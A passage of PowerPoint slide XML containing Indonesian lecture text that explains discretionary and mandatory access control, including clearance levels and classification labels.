              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> UNIX/Linux dan Microsoft Windows. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyalahgunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses Wajib</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Model DAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengekspos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (MAC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ACL pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> label </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klasifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berorientasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diklasifikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawahnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Top Secret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> label </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klasifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Top Secret, Secret, dan Confidential. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Rahasia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> level Rahasia dan Rahasia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelabelan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemberian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Poin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan-aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nondiskresioner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana pun.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>klasifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
